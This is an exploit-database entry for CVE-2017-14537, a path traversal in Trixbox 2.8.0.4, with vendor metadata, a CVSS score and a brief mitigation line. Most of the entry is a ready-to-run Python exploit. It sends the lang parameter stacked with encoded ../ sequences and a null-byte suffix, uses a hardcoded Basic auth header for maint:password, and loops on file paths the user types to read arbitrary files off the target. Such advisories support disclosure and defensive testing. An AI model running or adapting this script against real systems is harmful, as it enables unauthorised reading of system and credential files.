Trixbox 2.8.0.4 - 'lang' Path Traversal

vendor:

Trixbox

by:

Ron Jost (Hacker5preme)

6.5

CVSS

MEDIUM

Path Traversal

CWE

Product Name: Trixbox

Affected Version From: 2.8.0.4

Affected Version To: 2.8.0.4

Patch Exists: YES

Related CWE: CVE-2017-14537

CPE: a:trixbox:trixbox:2.8.0.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Xubuntu 20.04

2021

Trixbox 2.8.0.4 – ‘lang’ Path Traversal

Trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.

Mitigation:

Ensure that user-supplied input is validated and sanitized before being used in a file path.

Source

Exploit-DB raw data:

# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal
# Date: 27.05.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
# Credits to: Sachin Wagh
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
# Version: 2.8.0.4
# Tested on: Xubuntu 20.04
# CVE: CVE-2017-14537

'''
Description:
trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the
lang parameter to /maint/modules/home/index.php.
'''


'''
Import required modules:
'''
import requests
import sys
import urllib.parse


'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]


'''
Construct malicious request:
'''
# Constructing header:
header = {
    'Host': target_ip,
    'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'keep-alive',
    'Cookie': 'template=classic; lng=en; lng=en',
    'Upgrade-Insecure-Requests': '1',
    'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
}

# Constructing malicious link (payload):
base_link = 'http://' + target_ip + ':' + target_port
base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
base_link_addon_3 = '%00english'
print('')
base_link_addon_2 = input('Input the filepath or input EXIT: ')



'''
EXPLOIT:
'''
while base_link_addon_2 != 'EXIT':
    base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')
    exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3
    print('')
    exploit = requests.post(exploit_link, headers=header)
    print('Contents of ' + base_link_addon_2 + ':')
    for data in exploit.iter_lines():
        data = data.decode('utf-8')
        if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':
            print(data)
        else:
            break
    print('')
    base_link_addon_2 = input('Input the filepath or input EXIT: ')